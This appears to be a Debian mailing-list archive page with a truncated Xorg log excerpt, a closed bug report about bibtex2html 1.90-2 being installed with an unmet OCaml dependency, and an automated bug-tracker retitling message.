Contents of most recent Xorg X server log file
/var/log/Xorg.0.log:

This is a pre-release version of the X server from The X.Org Foundation.
It is not supported in any way.
Bugs may be filed in the bugzilla at http://bugs.freedesktop.org/.
Select the "xorg" product for bugs you find in this release.
Before reporting bugs in pre-release versions please check the
latest version in the X.Org Foundation git repository.
See http://wiki.x.org/wiki/GitPage for git access instructions.

X.Org X Server 1.4.0.90
Release Date: 5 September 2007
X Protocol Version 11, Revision 0
Build Operating System: Linux Debian (xorg-server

Bug#465241: marked as done (bibtex2html has been installed with an unmet dependency)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 15:41:43 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Re: Bug#465241: bibtex2html has been installed with an unmet 
dependency
has caused the Debian Bug report #465241,
regarding bibtex2html has been installed with an unmet dependency
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465241: http://bugs.debian.org/cgi-bin//465241
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: bibtex2html
Version: 1.90-2
Severity: grave
Justification: renders package unusable

Note: I'm not sure whether this is a bug in bibtex2html 1.90-2 or in
dpkg.

I've upgraded bibtex2htmlfrom 1.90-1 to 1.90-2 with aptitude and got
the following error:

Errors were encountered while processing:
 bibtex2html
E: Sub-process /usr/bin/dpkg returned an error code (1)
A package failed to install.  Trying to recover:
dpkg: dependency problems prevent configuration of bibtex2html:
 bibtex2html depends on ocaml-base-nox-3.10.1; however:
  Package ocaml-base-nox-3.10.1 is not installed.
dpkg: error processing bibtex2html (--configure):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 bibtex2html

It seems that the system (dpkg?) has let bibtex2html to be upgraded
to 1.90-2 though bibtex2html now depends on ocaml-base-nox-3.10.1 and
ocaml-base-nox-3.10.1 isn't installed (and isn't even available).

Now apt-get complains that the dependencies are incorrect.

Fortunately I still had the bibtex2html 1.90-1 Debian package in the
archives, and I could reinstall it with:

  dpkg -i /var/cache/apt/archives/bibtex2html_1.90-1_all.deb

But there's definitely something broken in bibtex2html 1.90-2 or dpkg.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.23.13-ws-intel64-p4 (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages bibtex2html depends on:
pn  ocaml-base-nox-3.10.1  (no description available)
ii  perl  5.8.8-12   Larry Wall's Practical Extraction 
ii  texlive-base  2007-13TeX Live: Essential programs and f

bibtex2html recommends no packages.

-- no debconf information


--- End Message ---
--- Begin Message ---
On Mon, Feb 11, 2008 at 12:29:36 +0100, Vincent Lefevre wrote:

> Note: I'm not sure whether this is a bug in bibtex2html 1.90-2 or in
> dpkg.
> 
Package dependencies are supposed to be checked by the package manager,
not the package being installed.  However you don't provide a log of how
you installed the new bibtex2html, so I don't think it's possible to
debug this.

Cheers,
Julien

--- End Message ---


Processed: retitle 456264 to [debuild] --lintian-opts doesn't work, user [EMAIL PROTECTED] ...

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.15
> retitle 456264 [debuild] --lintian-opts doesn't work
Bug#456264: gcj: non-free man page included
Changed Bug title to `[debuild] --lintian-opts doesn't work' from `gcj: 
non-free man page included'.
(By the way, that Bug is currently marked as done.)

> user [EMAIL PROTECTED]
Setting user to [EMAIL PROTECTED] (was [EMAIL PROTECTED]).
> usertags 456264 debuild
Bug#456264: [debuild] --lintian-opts doesn't work
There were no usertags set.
Usertags are now: debuild.
>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



  1   2   >